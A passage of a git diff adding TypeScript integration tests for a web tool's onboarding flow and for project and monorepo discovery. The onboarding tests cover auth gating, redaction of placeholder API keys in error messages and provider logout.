+  let buffer = "";
+
+  stream.on("data", (chunk: string | Buffer) => {
+    buffer += typeof chunk === "string" ? chunk : decoder.write(chunk);
+    while (true) {
+      const newlineIndex = buffer.indexOf("\n");
+      if (newlineIndex === -1) return;
+      const line = buffer.slice(0, newlineIndex);
+      buffer = buffer.slice(newlineIndex + 1);
+      onLine(line.endsWith("\r") ? line.slice(0, -1) : line);
+    }
+  });
+}
+
+function noEnvApiKey(): null {
+  return null;
+}
+
+function projectRequest(projectCwd: string, url: string, init?: RequestInit): Request {
+  const base = new URL(url, "http://localhost");
+  base.searchParams.set("project", projectCwd);
+  return new Request(base, init);
+}
+
+function makeWorkspaceFixture(): { projectCwd: string; sessionsDir: string; cleanup: () => void } {
+  const root = mkdtempSync(join(tmpdir(), "gsd-web-onboarding-"));
+  const projectCwd = join(root, "project");
+  const sessionsDir = join(root, "sessions");
+  const milestoneDir = join(projectCwd, ".gsd", "milestones", "M001");
+  const sliceDir = join(milestoneDir, "slices", "S02");
+  const tasksDir = join(sliceDir, "tasks");
+
+  mkdirSync(tasksDir, { recursive: true });
+  mkdirSync(sessionsDir, { recursive: true });
+
+  writeFileSync(
+    join(milestoneDir, "M001-ROADMAP.md"),
+    `# M001: Demo Milestone\n\n## Slices\n- [ ] **S02: First-run setup wizard** \`risk:medium\` \`depends:[S01]\`\n  > Browser onboarding\n`,
+  );
+  writeFileSync(
+    join(sliceDir, "S02-PLAN.md"),
+    `# S02: First-run setup wizard\n\n**Goal:** Demo\n**Demo:** Demo\n\n## Tasks\n- [ ] **T01: Establish shared onboarding auth truth and browser setup API** \`est:1h\`\n  Do the work.\n`,
+  );
+  writeFileSync(
+    join(tasksDir, "T01-PLAN.md"),
+    `# T01: Establish shared onboarding auth truth and browser setup API\n\n## Steps\n- do it\n`,
+  );
+
+  return {
+    projectCwd,
+    sessionsDir,
+    cleanup: () => rmSync(root, { recursive: true, force: true }),
+  };
+}
+
+function createSessionFile(projectCwd: string, sessionsDir: string, sessionId: string, name: string): string {
+  const sessionPath = join(sessionsDir, `2026-03-14T18-00-00-000Z_${sessionId}.jsonl`);
+  writeFileSync(
+    sessionPath,
+    [
+      JSON.stringify({
+        type: "session",
+        version: 3,
+        id: sessionId,
+        timestamp: "2026-03-14T18:00:00.000Z",
+        cwd: projectCwd,
+      }),
+      JSON.stringify({
+        type: "session_info",
+        id: "info-1",
+        parentId: null,
+        timestamp: "2026-03-14T18:00:01.000Z",
+        name,
+      }),
+    ].join("\n") + "\n",
+  );
+  return sessionPath;
+}
+
+function fakeAutoDashboardData() {
+  return {
+    active: false,
+    paused: false,
+    stepMode: false,
+    startTime: 0,
+    elapsed: 0,
+    currentUnit: null,
+    completedUnits: [],
+    basePath: "",
+    totalCost: 0,
+    totalTokens: 0,
+  };
+}
+
+function fakeWorkspaceIndex() {
+  return {
+    milestones: [
+      {
+        id: "M001",
+        title: "Demo Milestone",
+        roadmapPath: ".gsd/milestones/M001/M001-ROADMAP.md",
+        slices: [
+          {
+            id: "S02",
+            title: "First-run setup wizard",
+            done: false,
+            planPath: ".gsd/milestones/M001/slices/S02/S02-PLAN.md",
+            tasksDir: ".gsd/milestones/M001/slices/S02/tasks",
+            tasks: [
+              {
+                id: "T01",
+                title: "Establish shared onboarding auth truth and browser setup API",
+                done: false,
+                planPath: ".gsd/milestones/M001/slices/S02/tasks/T01-PLAN.md",
+              },
+            ],
+          },
+        ],
+      },
+    ],
+    active: {
+      milestoneId: "M001",
+      sliceId: "S02",
+      taskId: "T01",
+      phase: "executing",
+    },
+    scopes: [
+      { scope: "project", label: "project", kind: "project" },
+      { scope: "M001", label: "M001: Demo Milestone", kind: "milestone" },
+      { scope: "M001/S02", label: "M001/S02: First-run setup wizard", kind: "slice" },
+      {
+        scope: "M001/S02/T01",
+        label: "M001/S02/T01: Establish shared onboarding auth truth and browser setup API",
+        kind: "task",
+      },
+    ],
+    validationIssues: [],
+  };
+}
+
+function createHarness(onCommand: (command: any, harness: ReturnType<typeof createHarness>) => void) {
+  let spawnCalls = 0;
+  let child: FakeRpcChild | null = null;
+
+  const harness = {
+    spawn(command: string, args: readonly string[], options: Record<string, unknown>) {
+      spawnCalls += 1;
+      child = new FakeRpcChild();
+      attachJsonLineReader(child.stdin, (line) => {
+        onCommand(JSON.parse(line), harness);
+      });
+      void command;
+      void args;
+      void options;
+      return child as any;
+    },
+    emit(payload: unknown) {
+      if (!child) throw new Error("fake child not started");
+      child.stdout.write(serializeJsonLine(payload));
+    },
+    get spawnCalls() {
+      return spawnCalls;
+    },
+  };
+
+  return harness;
+}
+
+function configureBridgeFixture(fixture: { projectCwd: string; sessionsDir: string }, sessionId: string) {
+  const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, sessionId, "Onboarding Session");
+  const harness = createHarness((command, current) => {
+    if (command.type === "get_state") {
+      current.emit({
+        id: command.id,
+        type: "response",
+        command: "get_state",
+        success: true,
+        data: {
+          sessionId,
+          sessionFile: sessionPath,
+          thinkingLevel: "off",
+          isStreaming: false,
+          isCompacting: false,
+          steeringMode: "all",
+          followUpMode: "all",
+          autoCompactionEnabled: false,
+          autoRetryEnabled: false,
+          retryInProgress: false,
+          retryAttempt: 0,
+          messageCount: 0,
+          pendingMessageCount: 0,
+        },
+      });
+      return;
+    }
+
+    assert.fail(`unexpected bridge command during onboarding contract test: ${command.type}`);
+  });
+
+  bridge.configureBridgeServiceForTests({
+    env: {
+      GSD_WEB_PROJECT_CWD: fixture.projectCwd,
+      GSD_WEB_PROJECT_SESSIONS_DIR: fixture.sessionsDir,
+      GSD_WEB_PACKAGE_ROOT: repoRoot,
+    },
+    spawn: harness.spawn,
+    indexWorkspace: async () => fakeWorkspaceIndex(),
+    getAutoDashboardData: () => fakeAutoDashboardData(),
+  });
+
+  return harness;
+}
+
+test("boot and onboarding routes expose locked required state plus explicitly skippable optional setup when auth is missing", async (t) => {
+  const fixture = makeWorkspaceFixture();
+  clearOnboardingEnv();
+  const authStorage = AuthStorage.inMemory({});
+  configureBridgeFixture(fixture, "sess-missing-auth");
+  onboarding.configureOnboardingServiceForTests({ authStorage, getEnvApiKey: noEnvApiKey });
+
+  t.after(async () => {
+    onboarding.resetOnboardingServiceForTests();
+    await bridge.resetBridgeServiceForTests();
+    restoreOnboardingEnv();
+    fixture.cleanup();
+  });
+
+  const bootResponse = await bootRoute.GET(projectRequest(fixture.projectCwd, "/api/boot"));
+  assert.equal(bootResponse.status, 200);
+  const bootPayload = (await bootResponse.json()) as any;
+
+  assert.equal(bootPayload.onboardingNeeded, true);
+  assert.equal(bootPayload.onboarding.status, "blocked");
+  assert.equal(bootPayload.onboarding.locked, true);
+  assert.equal(bootPayload.onboarding.lockReason, "required_setup");
+  assert.equal(bootPayload.onboarding.bridgeAuthRefresh.phase, "idle");
+  assert.equal(bootPayload.onboarding.required.satisfied, false);
+  assert.equal(bootPayload.onboarding.required.satisfiedBy, null);
+  assert.equal(bootPayload.onboarding.optional.skippable, true);
+  assert.ok(bootPayload.onboarding.optional.sections.every((section: any) => section.blocking === false));
+
+  const providerIds = bootPayload.onboarding.required.providers.map((provider: any) => provider.id);
+  assert.deepEqual(providerIds, [
+    "anthropic",
+    "openai",
+    "github-copilot",
+    "openai-codex",
+    "google-gemini-cli",
+    "google-antigravity",
+    "google",
+    "groq",
+    "xai",
+    "openrouter",
+    "mistral",
+  ]);
+  const anthropicProvider = bootPayload.onboarding.required.providers.find((provider: any) => provider.id === "anthropic");
+  assert.equal(anthropicProvider.supports.apiKey, true);
+  assert.equal(anthropicProvider.supports.oauthAvailable, true);
+
+  const onboardingResponse = await onboardingRoute.GET(projectRequest(fixture.projectCwd, "/api/onboarding"));
+  assert.equal(onboardingResponse.status, 200);
+  const onboardingPayload = (await onboardingResponse.json()) as any;
+  assert.equal(onboardingPayload.onboarding.locked, true);
+  assert.equal(onboardingPayload.onboarding.optional.skippable, true);
+});
+
+test("runtime env-backed auth unlocks boot onboarding state and reports the environment source", async (t) => {
+  const fixture = makeWorkspaceFixture();
+  clearOnboardingEnv();
+  const authStorage = AuthStorage.inMemory({});
+  const previousGithubToken = process.env.GITHUB_TOKEN;
+  process.env.GITHUB_TOKEN = "ghu_runtime_env_token";
+  configureBridgeFixture(fixture, "sess-env-auth");
+  onboarding.configureOnboardingServiceForTests({
+    authStorage,
+    getEnvApiKey: (provider: string) => (provider === "github-copilot" ? process.env.GITHUB_TOKEN : undefined),
+  });
+
+  t.after(async () => {
+    if (previousGithubToken === undefined) {
+    delete process.env.GITHUB_TOKEN;
+    } else {
+    process.env.GITHUB_TOKEN = previousGithubToken;
+    }
+    onboarding.resetOnboardingServiceForTests();
+    await bridge.resetBridgeServiceForTests();
+    restoreOnboardingEnv();
+    fixture.cleanup();
+  });
+
+  const bootResponse = await bootRoute.GET(projectRequest(fixture.projectCwd, "/api/boot"));
+  assert.equal(bootResponse.status, 200);
+  const bootPayload = (await bootResponse.json()) as any;
+
+  assert.equal(bootPayload.onboardingNeeded, false);
+  assert.equal(bootPayload.onboarding.locked, false);
+  assert.equal(bootPayload.onboarding.lockReason, null);
+  assert.equal(bootPayload.onboarding.bridgeAuthRefresh.phase, "idle");
+  assert.deepEqual(bootPayload.onboarding.required.satisfiedBy, {
+    providerId: "github-copilot",
+    source: "environment",
+  });
+  const copilotProvider = bootPayload.onboarding.required.providers.find((provider: any) => provider.id === "github-copilot");
+  assert.equal(copilotProvider.configured, true);
+  assert.equal(copilotProvider.configuredVia, "environment");
+});
+
+test("failed API-key validation stays locked, redacts the error, and is reflected in boot state without persisting auth", async (t) => {
+  const fixture = makeWorkspaceFixture();
+  clearOnboardingEnv();
+  const authStorage = AuthStorage.inMemory({});
+  configureBridgeFixture(fixture, "sess-validation-failure");
+  onboarding.configureOnboardingServiceForTests({
+    authStorage,
+    getEnvApiKey: noEnvApiKey,
+    validateApiKey: async () => ({
+      ok: false,
+      message: "OpenAI rejected sk-test-secret-123456 because Bearer sk-test-secret-123456 is invalid",
+    }),
+  });
+
+  t.after(async () => {
+    onboarding.resetOnboardingServiceForTests();
+    await bridge.resetBridgeServiceForTests();
+    restoreOnboardingEnv();
+    fixture.cleanup();
+  });
+
+  const validationResponse = await onboardingRoute.POST(
+    projectRequest(fixture.projectCwd, "/api/onboarding", {
+      method: "POST",
+      body: JSON.stringify({
+        action: "save_api_key",
+        providerId: "openai",
+        apiKey: "sk-test-secret-123456",
+      }),
+    }),
+  );
+
+  assert.equal(validationResponse.status, 422);
+  const validationPayload = (await validationResponse.json()) as any;
+  assert.equal(validationPayload.onboarding.locked, true);
+  assert.equal(validationPayload.onboarding.required.satisfied, false);
+  assert.equal(validationPayload.onboarding.lastValidation.status, "failed");
+  assert.equal(validationPayload.onboarding.lastValidation.providerId, "openai");
+  assert.equal(validationPayload.onboarding.lastValidation.persisted, false);
+  assert.equal(validationPayload.onboarding.lockReason, "required_setup");
+  assert.equal(validationPayload.onboarding.bridgeAuthRefresh.phase, "idle");
+  assert.match(validationPayload.onboarding.lastValidation.message, /OpenAI rejected/i);
+  assert.doesNotMatch(validationPayload.onboarding.lastValidation.message, /sk-test-secret-123456/);
+  assert.equal(authStorage.hasAuth("openai"), false);
+
+  const bootResponse = await bootRoute.GET(projectRequest(fixture.projectCwd, "/api/boot"));
+  assert.equal(bootResponse.status, 200);
+  const bootPayload = (await bootResponse.json()) as any;
+  assert.equal(bootPayload.onboarding.locked, true);
+  assert.equal(bootPayload.onboarding.lastValidation.status, "failed");
+  assert.doesNotMatch(bootPayload.onboarding.lastValidation.message, /sk-test-secret-123456/);
+});
+
+test("direct prompt commands cannot bypass onboarding while required setup is still locked", async (t) => {
+  const fixture = makeWorkspaceFixture();
+  clearOnboardingEnv();
+  const authStorage = AuthStorage.inMemory({});
+  const harness = configureBridgeFixture(fixture, "sess-command-locked");
+  onboarding.configureOnboardingServiceForTests({ authStorage, getEnvApiKey: noEnvApiKey });
+
+  t.after(async () => {
+    onboarding.resetOnboardingServiceForTests();
+    await bridge.resetBridgeServiceForTests();
+    restoreOnboardingEnv();
+    fixture.cleanup();
+  });
+
+  const response = await commandRoute.POST(
+    projectRequest(fixture.projectCwd, "/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "prompt", message: "hello from bypass attempt" }),
+    }),
+  );
+
+  assert.equal(response.status, 423);
+  const payload = (await response.json()) as any;
+  assert.equal(payload.success, false);
+  assert.equal(payload.command, "prompt");
+  assert.equal(payload.code, "onboarding_locked");
+  assert.equal(payload.details.reason, "required_setup");
+  assert.equal(payload.details.onboarding.locked, true);
+  assert.equal(harness.spawnCalls, 0);
+
+  const stateResponse = await commandRoute.POST(
+    projectRequest(fixture.projectCwd, "/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "get_state" }),
+    }),
+  );
+  assert.equal(stateResponse.status, 200);
+  const statePayload = (await stateResponse.json()) as any;
+  assert.equal(statePayload.success, true);
+  assert.equal(statePayload.command, "get_state");
+  assert.equal(harness.spawnCalls, 1);
+});
+
+test("bridge auth refresh failures remain inspectable and keep the workspace locked after credentials validate", async (t) => {
+  const fixture = makeWorkspaceFixture();
+  clearOnboardingEnv();
+  const authStorage = AuthStorage.inMemory({});
+  configureBridgeFixture(fixture, "sess-refresh-failure");
+  onboarding.configureOnboardingServiceForTests({
+    authStorage,
+    getEnvApiKey: noEnvApiKey,
+    validateApiKey: async () => ({ ok: true, message: "openai credentials validated" }),
+    refreshBridgeAuth: async () => {
+      throw new Error("bridge restart failed for sk-refresh-secret-123456");
+    },
+  });
+
+  t.after(async () => {
+    onboarding.resetOnboardingServiceForTests();
+    await bridge.resetBridgeServiceForTests();
+    restoreOnboardingEnv();
+    fixture.cleanup();
+  });
+
+  const validationResponse = await onboardingRoute.POST(
+    projectRequest(fixture.projectCwd, "/api/onboarding", {
+      method: "POST",
+      body: JSON.stringify({
+        action: "save_api_key",
+        providerId: "openai",
+        apiKey: "sk-valid-123456",
+      }),
+    }),
+  );
+
+  assert.equal(validationResponse.status, 503);
+  const validationPayload = (await validationResponse.json()) as any;
+  assert.equal(validationPayload.onboarding.required.satisfied, true);
+  assert.equal(validationPayload.onboarding.locked, true);
+  assert.equal(validationPayload.onboarding.lockReason, "bridge_refresh_failed");
+  assert.equal(validationPayload.onboarding.lastValidation.status, "succeeded");
+  assert.equal(validationPayload.onboarding.bridgeAuthRefresh.phase, "failed");
+  assert.match(validationPayload.onboarding.bridgeAuthRefresh.error, /bridge restart failed/i);
+  assert.doesNotMatch(validationPayload.onboarding.bridgeAuthRefresh.error, /sk-refresh-secret-123456/);
+  assert.equal(authStorage.hasAuth("openai"), true);
+
+  const bootResponse = await bootRoute.GET(projectRequest(fixture.projectCwd, "/api/boot"));
+  const bootPayload = (await bootResponse.json()) as any;
+  assert.equal(bootPayload.onboarding.locked, true);
+  assert.equal(bootPayload.onboarding.lockReason, "bridge_refresh_failed");
+  assert.equal(bootPayload.onboarding.bridgeAuthRefresh.phase, "failed");
+});
+
+test("successful API-key validation persists the credential and unlocks onboarding", async (t) => {
+  const fixture = makeWorkspaceFixture();
+  clearOnboardingEnv();
+  const authStorage = AuthStorage.inMemory({});
+  const harness = configureBridgeFixture(fixture, "sess-validation-success");
+  onboarding.configureOnboardingServiceForTests({
+    authStorage,
+    getEnvApiKey: noEnvApiKey,
+    validateApiKey: async () => ({ ok: true, message: "openai credentials validated" }),
+  });
+
+  t.after(async () => {
+    onboarding.resetOnboardingServiceForTests();
+    await bridge.resetBridgeServiceForTests();
+    restoreOnboardingEnv();
+    fixture.cleanup();
+  });
+
+  const validationResponse = await onboardingRoute.POST(
+    projectRequest(fixture.projectCwd, "/api/onboarding", {
+      method: "POST",
+      body: JSON.stringify({
+        action: "save_api_key",
+        providerId: "openai",
+        apiKey: "sk-valid-123456",
+      }),
+    }),
+  );
+
+  assert.equal(validationResponse.status, 200);
+  const validationPayload = (await validationResponse.json()) as any;
+  assert.equal(validationPayload.onboarding.locked, false);
+  assert.deepEqual(validationPayload.onboarding.required.satisfiedBy, {
+    providerId: "openai",
+    source: "auth_file",
+  });
+  assert.equal(validationPayload.onboarding.lastValidation.status, "succeeded");
+  assert.equal(validationPayload.onboarding.lastValidation.persisted, true);
+  assert.equal(validationPayload.onboarding.lockReason, null);
+  assert.equal(validationPayload.onboarding.bridgeAuthRefresh.phase, "succeeded");
+  assert.equal(authStorage.hasAuth("openai"), true);
+  assert.equal(harness.spawnCalls, 1);
+
+  const bootResponse = await bootRoute.GET(projectRequest(fixture.projectCwd, "/api/boot"));
+  const bootPayload = (await bootResponse.json()) as any;
+  assert.equal(bootPayload.onboarding.locked, false);
+  assert.equal(bootPayload.onboarding.lockReason, null);
+  assert.equal(bootPayload.onboarding.bridgeAuthRefresh.phase, "succeeded");
+  assert.equal(bootPayload.onboardingNeeded, false);
+});
+
+test("logout_provider removes saved auth, refreshes the bridge, and relocks onboarding when it was the only provider", async (t) => {
+  const fixture = makeWorkspaceFixture();
+  clearOnboardingEnv();
+  const authStorage = AuthStorage.inMemory({
+    openai: { type: "api_key", key: "sk-saved-logout" },
+  } as any);
+  const harness = configureBridgeFixture(fixture, "sess-logout-success");
+  onboarding.configureOnboardingServiceForTests({ authStorage, getEnvApiKey: noEnvApiKey });
+
+  t.after(async () => {
+    onboarding.resetOnboardingServiceForTests();
+    await bridge.resetBridgeServiceForTests();
+    restoreOnboardingEnv();
+    fixture.cleanup();
+  });
+
+  const bootBefore = await bootRoute.GET(projectRequest(fixture.projectCwd, "/api/boot"));
+  const bootBeforePayload = (await bootBefore.json()) as any;
+  assert.equal(bootBeforePayload.onboarding.locked, false);
+  assert.equal(bootBeforePayload.onboarding.required.satisfiedBy.providerId, "openai");
+  assert.equal(harness.spawnCalls, 1);
+
+  const logoutResponse = await onboardingRoute.POST(
+    projectRequest(fixture.projectCwd, "/api/onboarding", {
+      method: "POST",
+      body: JSON.stringify({
+        action: "logout_provider",
+        providerId: "openai",
+      }),
+    }),
+  );
+
+  assert.equal(logoutResponse.status, 200);
+  const logoutPayload = (await logoutResponse.json()) as any;
+  assert.equal(logoutPayload.onboarding.locked, true);
+  assert.equal(logoutPayload.onboarding.lockReason, "required_setup");
+  assert.equal(logoutPayload.onboarding.bridgeAuthRefresh.phase, "succeeded");
+  assert.equal(logoutPayload.onboarding.lastValidation, null);
+  assert.equal(authStorage.hasAuth("openai"), false);
+  assert.equal(harness.spawnCalls, 2);
+
+  const bootAfter = await bootRoute.GET(projectRequest(fixture.projectCwd, "/api/boot"));
+  const bootAfterPayload = (await bootAfter.json()) as any;
+  assert.equal(bootAfterPayload.onboarding.locked, true);
+  assert.equal(bootAfterPayload.onboarding.lockReason, "required_setup");
+  assert.equal(bootAfterPayload.onboarding.bridgeAuthRefresh.phase, "succeeded");
+  assert.equal(bootAfterPayload.onboarding.required.satisfied, false);
+});
+
+test("logout_provider fails clearly for environment-backed auth that the browser cannot remove", async (t) => {
+  const fixture = makeWorkspaceFixture();
+  clearOnboardingEnv();
+  const authStorage = AuthStorage.inMemory({});
+  const previousGithubToken = process.env.GITHUB_TOKEN;
+  process.env.GITHUB_TOKEN = "ghu_env_only_token";
+  configureBridgeFixture(fixture, "sess-logout-env");
+  onboarding.configureOnboardingServiceForTests({
+    authStorage,
+    getEnvApiKey: (provider: string) => (provider === "github-copilot" ? process.env.GITHUB_TOKEN : undefined),
+  });
+
+  t.after(async () => {
+    if (previousGithubToken === undefined) {
+    delete process.env.GITHUB_TOKEN;
+    } else {
+    process.env.GITHUB_TOKEN = previousGithubToken;
+    }
+    onboarding.resetOnboardingServiceForTests();
+    await bridge.resetBridgeServiceForTests();
+    restoreOnboardingEnv();
+    fixture.cleanup();
+  });
+
+  const bootBefore = await bootRoute.GET(projectRequest(fixture.projectCwd, "/api/boot"));
+  const bootBeforePayload = (await bootBefore.json()) as any;
+  assert.equal(bootBeforePayload.onboarding.locked, false);
+  assert.equal(bootBeforePayload.onboarding.required.satisfiedBy.providerId, "github-copilot");
+  assert.equal(bootBeforePayload.onboarding.required.satisfiedBy.source, "environment");
+
+  const logoutResponse = await onboardingRoute.POST(
+    projectRequest(fixture.projectCwd, "/api/onboarding", {
+      method: "POST",
+      body: JSON.stringify({
+        action: "logout_provider",
+        providerId: "github-copilot",
+      }),
+    }),
+  );
+
+  assert.equal(logoutResponse.status, 400);
+  const logoutPayload = (await logoutResponse.json()) as any;
+  assert.match(logoutPayload.error, /cannot be logged out from the browser surface/i);
+  assert.equal(logoutPayload.onboarding.locked, false);
+  assert.equal(logoutPayload.onboarding.required.satisfiedBy.providerId, "github-copilot");
+  assert.equal(logoutPayload.onboarding.required.satisfiedBy.source, "environment");
+});
diff --git a/src/tests/web-onboarding-presentation.test.ts b/src/tests/integration/web-onboarding-presentation.test.ts
similarity index 97%
rename from src/tests/web-onboarding-presentation.test.ts
rename to src/tests/integration/web-onboarding-presentation.test.ts
index f74a0ff59..8cb297c2b 100644
--- a/src/tests/web-onboarding-presentation.test.ts
+++ b/src/tests/integration/web-onboarding-presentation.test.ts
@@ -1,7 +1,7 @@
 import test from "node:test"
 import assert from "node:assert/strict"
 
-const { getOnboardingPresentation } = await import("../../web/lib/gsd-workspace-store.tsx")
+const { getOnboardingPresentation } = await import("../../../web/lib/gsd-workspace-store.tsx")
 
 function makeOnboardingState(overrides: Record<string, unknown> = {}) {
   return {
diff --git a/src/tests/integration/web-project-discovery-contract.test.ts b/src/tests/integration/web-project-discovery-contract.test.ts
new file mode 100644
index 000000000..51ca44f93
--- /dev/null
+++ b/src/tests/integration/web-project-discovery-contract.test.ts
@@ -0,0 +1,270 @@
+import test, { after, describe } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { basename, join } from "node:path";
+
+
+import { discoverProjects } from "../../web/project-discovery-service.ts";
+import { detectMonorepo } from "../../web/bridge-service.ts";
+
+// ---------------------------------------------------------------------------
+// Fixture setup — standard multi-project root
+// ---------------------------------------------------------------------------
+
+const tempRoot = mkdtempSync(join(tmpdir(), "gsd-project-discovery-"));
+
+// project-a: brownfield (package.json + .git)
+const projectA = join(tempRoot, "project-a");
+mkdirSync(projectA);
+mkdirSync(join(projectA, ".git"));
+writeFileSync(join(projectA, "package.json"), "{}");
+
+// project-b: empty-gsd (.gsd folder, no milestones)
+const projectB = join(tempRoot, "project-b");
+mkdirSync(projectB);
+mkdirSync(join(projectB, ".gsd"));
+
+// project-c: brownfield (Cargo.toml)
+const projectC = join(tempRoot, "project-c");
+mkdirSync(projectC);
+writeFileSync(join(projectC, "Cargo.toml"), "");
+
+// project-d: blank (empty)
+const projectD = join(tempRoot, "project-d");
+mkdirSync(projectD);
+
+// .hidden: should be excluded
+mkdirSync(join(tempRoot, ".hidden"));
+
+// node_modules: should be excluded
+mkdirSync(join(tempRoot, "node_modules"));
+
+// ---------------------------------------------------------------------------
+// Fixture setup — monorepo roots
+// ---------------------------------------------------------------------------
+
+// monorepo-pnpm: detected via pnpm-workspace.yaml
+const monorepoPnpm = mkdtempSync(join(tmpdir(), "gsd-mono-pnpm-"));
+mkdirSync(join(monorepoPnpm, ".git"));
+writeFileSync(join(monorepoPnpm, "package.json"), '{"name":"my-monorepo"}');
+writeFileSync(join(monorepoPnpm, "pnpm-workspace.yaml"), 'packages:\n  - "packages/*"');
+mkdirSync(join(monorepoPnpm, "packages"));
+mkdirSync(join(monorepoPnpm, "packages", "pkg-a"));
+mkdirSync(join(monorepoPnpm, "packages", "pkg-b"));
+
+// monorepo-lerna: detected via lerna.json
+const monorepoLerna = mkdtempSync(join(tmpdir(), "gsd-mono-lerna-"));
+mkdirSync(join(monorepoLerna, ".git"));
+writeFileSync(join(monorepoLerna, "package.json"), '{"name":"lerna-mono"}');
+writeFileSync(join(monorepoLerna, "lerna.json"), '{"version":"1.0.0"}');
+mkdirSync(join(monorepoLerna, "backend"));
+mkdirSync(join(monorepoLerna, "frontend"));
+
+// monorepo-workspaces: detected via package.json workspaces field
+const monorepoWorkspaces = mkdtempSync(join(tmpdir(), "gsd-mono-ws-"));
+mkdirSync(join(monorepoWorkspaces, ".git"));
+writeFileSync(join(monorepoWorkspaces, "package.json"), '{"name":"ws-mono","workspaces":["packages/*"]}');
+mkdirSync(join(monorepoWorkspaces, "packages"));
+mkdirSync(join(monorepoWorkspaces, "packages", "core"));
+mkdirSync(join(monorepoWorkspaces, "packages", "ui"));
+
+// monorepo-turbo: detected via turbo.json
+const monorepoTurbo = mkdtempSync(join(tmpdir(), "gsd-mono-turbo-"));
+mkdirSync(join(monorepoTurbo, ".git"));
+writeFileSync(join(monorepoTurbo, "package.json"), '{"name":"turbo-mono"}');
+writeFileSync(join(monorepoTurbo, "turbo.json"), '{"pipeline":{}}');
+mkdirSync(join(monorepoTurbo, "apps"));
+mkdirSync(join(monorepoTurbo, "packages"));
+
+// monorepo-nx: detected via nx.json
+const monorepoNx = mkdtempSync(join(tmpdir(), "gsd-mono-nx-"));
+mkdirSync(join(monorepoNx, ".git"));
+writeFileSync(join(monorepoNx, "package.json"), '{"name":"nx-mono"}');
+writeFileSync(join(monorepoNx, "nx.json"), '{}');
+mkdirSync(join(monorepoNx, "libs"));
+mkdirSync(join(monorepoNx, "apps"));
+
+// non-monorepo: plain project with package.json (no workspaces, no marker files)
+const plainProject = mkdtempSync(join(tmpdir(), "gsd-plain-project-"));
+mkdirSync(join(plainProject, ".git"));
+writeFileSync(join(plainProject, "package.json"), '{"name":"plain","dependencies":{}}');
+mkdirSync(join(plainProject, "src"));
+
+// ---------------------------------------------------------------------------
+// Teardown
+// ---------------------------------------------------------------------------
+
+after(() => {
+  rmSync(tempRoot, { recursive: true, force: true });
+  rmSync(monorepoPnpm, { recursive: true, force: true });
+  rmSync(monorepoLerna, { recursive: true, force: true });
+  rmSync(monorepoWorkspaces, { recursive: true, force: true });
+  rmSync(monorepoTurbo, { recursive: true, force: true });
+  rmSync(monorepoNx, { recursive: true, force: true });
+  rmSync(plainProject, { recursive: true, force: true });
+});
+
+// ---------------------------------------------------------------------------
+// Tests — standard multi-project root
+// ---------------------------------------------------------------------------
+
+describe("project-discovery", () => {
+  test("discovers exactly 4 project directories (excludes hidden + node_modules)", () => {
+    const results = discoverProjects(tempRoot);
+    assert.equal(results.length, 4, `Expected 4 projects, got ${results.length}: ${results.map(r => r.name).join(", ")}`);
+  });
+
+  test("results are sorted alphabetically by name", () => {
+    const results = discoverProjects(tempRoot);
+    const names = results.map(r => r.name);
+    assert.deepStrictEqual(names, ["project-a", "project-b", "project-c", "project-d"]);
+  });
+
+  test("project-a is detected as brownfield with correct signals", () => {
+    const results = discoverProjects(tempRoot);
+    const a = results.find(r => r.name === "project-a");
+    assert.ok(a, "project-a not found");
+    assert.equal(a.kind, "brownfield");
+    assert.equal(a.signals.hasPackageJson, true);
+    assert.equal(a.signals.hasGitRepo, true);
+  });
+
+  test("project-b is detected as empty-gsd", () => {
+    const results = discoverProjects(tempRoot);
+    const b = results.find(r => r.name === "project-b");
+    assert.ok(b, "project-b not found");
+    assert.equal(b.kind, "empty-gsd");
+    assert.equal(b.signals.hasGsdFolder, true);
+  });
+
+  test("project-c is detected as brownfield with hasCargo signal", () => {
+    const results = discoverProjects(tempRoot);
+    const c = results.find(r => r.name === "project-c");
+    assert.ok(c, "project-c not found");
+    assert.equal(c.kind, "brownfield");
+    assert.equal(c.signals.hasCargo, true);
+  });
+
+  test("project-d is detected as blank", () => {
+    const results = discoverProjects(tempRoot);
+    const d = results.find(r => r.name === "project-d");
+    assert.ok(d, "project-d not found");
+    assert.equal(d.kind, "blank");
+  });
+
+  test("excludes .hidden and node_modules directories", () => {
+    const results = discoverProjects(tempRoot);
+    const names = results.map(r => r.name);
+    assert.ok(!names.includes(".hidden"), ".hidden should be excluded");
+    assert.ok(!names.includes("node_modules"), "node_modules should be excluded");
+  });
+
+  test("all entries have lastModified as a number > 0", () => {
+    const results = discoverProjects(tempRoot);
+    for (const entry of results) {
+      assert.equal(typeof entry.lastModified, "number");
+      assert.ok(entry.lastModified > 0, `${entry.name} lastModified should be > 0`);
+    }
+  });
+
+  test("all entries have valid path and name", () => {
+    const results = discoverProjects(tempRoot);
+    for (const entry of results) {
+      assert.ok(entry.path.startsWith(tempRoot), `${entry.name} path should start with tempRoot`);
+      assert.ok(entry.name.length > 0, "name should not be empty");
+    }
+  });
+
+  test("nonexistent path returns empty array", () => {
+    const results = discoverProjects("/nonexistent/path/that/does/not/exist");
+    assert.deepStrictEqual(results, []);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Tests — monorepo detection
+// ---------------------------------------------------------------------------
+
+describe("detectMonorepo", () => {
+  test("detects pnpm-workspace.yaml", () => {
+    assert.ok(detectMonorepo(monorepoPnpm));
+  });
+
+  test("detects lerna.json", () => {
+    assert.ok(detectMonorepo(monorepoLerna));
+  });
+
+  test("detects package.json with workspaces field", () => {
+    assert.ok(detectMonorepo(monorepoWorkspaces));
+  });
+
+  test("detects turbo.json", () => {
+    assert.ok(detectMonorepo(monorepoTurbo));
+  });
+
+  test("detects nx.json", () => {
+    assert.ok(detectMonorepo(monorepoNx));
+  });
+
+  test("does not detect plain project as monorepo", () => {
+    assert.ok(!detectMonorepo(plainProject));
+  });
+
+  test("does not detect empty directory as monorepo", () => {
+    assert.ok(!detectMonorepo(tempRoot));
+  });
+});
+
+// ---------------------------------------------------------------------------
+// Tests — monorepo root as devRoot returns single entry
+// ---------------------------------------------------------------------------
+
+describe("project-discovery with monorepo root as devRoot", () => {
+  test("pnpm monorepo root returns single project entry", () => {
+    const results = discoverProjects(monorepoPnpm);
